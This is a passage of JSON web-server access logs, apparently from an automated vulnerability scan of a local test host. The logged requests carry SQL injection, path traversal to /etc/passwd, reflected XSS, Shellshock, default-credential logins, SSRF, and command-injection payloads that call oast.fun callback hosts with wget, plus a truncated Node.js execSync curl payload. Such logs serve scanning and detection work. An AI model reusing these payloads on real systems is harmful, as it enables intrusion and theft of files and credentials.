AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"USERNAME=student&PASSWORD=student@123&language=en&log=","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.061","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"methodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /./RestAPI/Connection HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.060","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.050","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /module/smartblog/archive?month=1&year=1&day=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,(SELECT%20MD5(55555)),NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /laravel-filemanager/download?working_dir=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2F&type=&file=passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jmx-console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /htmltopdf/downfile.php?filename=/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\x22> HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.060","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"student_id=updatexml(0x23,concat(1,md5(1234)),1)&button=Save&TRANSFER[SCHOOL]=5&TRANSFER[Grade_Level]=5","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /TransferredOutModal.php?modfunc=detail HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"{\x0D\x0A \x22type\x22: \x22fs\x22,\x0D\x0A \x22settings\x22: {\x0D\x0A \x22location\x22: \x22/usr/share/elasticsearch/repo/test/snapshot-backdata\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /_snapshot/test2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /127.0.0.1.db HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.214","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pagespeed-global-admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.229","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zp/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/72 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?layout=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.215","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"macAddress=112233445566%3Bwget+http%3A%2F%2Fc9v8h88smpv8c1ig07h0jwcsx69qmdog3.oast.fun%23®info=0&writeData=Submit","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boardDataWW.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.216","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"{\x22user\x22:\x22access-admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"http://127.0.0.1/artifactory/webapp/", "request_method":"POST", "http_x_forwarded_for":"127.0.0.1"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fc9v8h8gsmpv8c1qg07h0auwk6gx9dnkjp.oast.fun%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/change HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /airflow.cfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/user/login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Reports/Pages/Folder.aspx HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/catalogsearch/advanced/result/?name=e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/73 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /gallery/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=https://c9v8h88smpv8c1ig07h0w6j1ci754bq4m.oast.fun HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"macAddress=112233445566%3Bwget+http%3A%2F%2Fc9v8h8gsmpv8c1qg07h0quksjxn73ttj7.oast.fun%23®info=0&writeData=Submit","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /boardDataWW.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fc9v8h8gsmpv8c1qg07h0n18hpqrwnbq9j.oast.fun%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console-selfservice/SelfService.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"[\x22127.0.0.1:443/ui/\x22]","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /casa/nodes/thumbprints HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mifs/c/d/android.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"action=login&u=admin&p=admin256","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /service.web HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zenphoto/zp-core/setup/index.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/v4/users/74 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cache/backup/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.063","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/slogin/login.py HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.066","http_user_agent":"() { :; }; echo ; echo ; /bin/cat /etc/passwd", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.051","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:35:02 +0000","request_body":"document=this.constructor.constructor(\x22return process\x22)().mainModule.require(\x22child_process\x22).execSync(\x22curl 